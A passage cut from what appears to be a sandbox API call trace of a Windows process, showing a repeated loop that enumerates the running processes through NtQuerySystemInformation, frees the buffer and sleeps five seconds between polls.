AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0165.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0165.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0165.573] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0165.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0165.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0165.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0165.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0165.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0165.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0165.912] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0165.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0165.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0165.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0165.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0165.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0166.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0166.047] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0166.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0166.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0166.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0166.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0166.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0166.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0166.208] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0166.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0166.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0166.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0166.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0166.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0166.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0166.543] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0166.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0166.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0166.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0166.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0166.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0166.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0166.715] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0166.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0166.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0166.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0166.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0166.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0166.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0166.927] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0166.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0166.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0166.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0166.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0166.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0167.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0167.083] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0167.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0167.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0167.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0167.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0167.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0167.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0167.231] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0167.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0167.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0167.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0167.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0167.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0167.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0167.354] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0167.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0167.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0167.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0167.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0167.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0167.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0167.665] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0167.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0167.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0167.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0167.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0167.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0167.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0167.789] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0167.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0167.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0167.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0167.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0167.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0167.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0167.912] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0167.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0167.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0167.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0167.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0167.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0168.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0168.088] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0168.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0168.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0168.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0168.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0168.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0168.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0168.263] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0168.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0168.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0168.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0168.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0168.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0168.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0168.618] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0168.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0168.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0168.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0168.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0168.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0168.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0168.749] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0168.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0168.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0168.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0168.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0168.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0168.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0168.892] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0168.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0168.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0168.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0168.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0168.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0169.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0169.046] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0169.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0169.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0169.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0169.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0169.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0169.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0169.194] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0169.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0169.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0169.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0169.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0169.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0169.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0169.564] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0169.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0169.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0169.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0169.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0169.576] NtQuerySystemInformation (in: 